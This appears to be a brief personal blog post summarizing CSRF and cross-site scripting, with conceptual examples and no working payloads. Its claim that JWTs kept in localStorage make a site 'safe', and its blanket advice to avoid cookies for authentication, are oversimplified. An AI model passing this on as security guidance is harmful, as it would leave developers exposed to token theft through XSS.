Sunday, January 29, 2017

CSRF/XSS summary

If you are using cookies for authentication, someone can embed URLs from your domain in a random webpage to trigger side effects.
For e.g. if you have a GET url for and someone creates <img src=""/> in his webpage and your user visits that page, he would be immediately logged out.
Similarly POST URLs can be embedded in <form> elements.

But if you are not using cookies, for e.g. you might be using JWT and storing the token in localstorage, you are safe.

Best solution: Don't use cookies for authentication


A bad guy posts a message on a forum. Message contains a js script tag. Whenever anyone visits the forum, that javascript runs and steals that person's cookie.

Solution: Escape any html or user submitted content you publish on your website.

No comments:

Blog Archive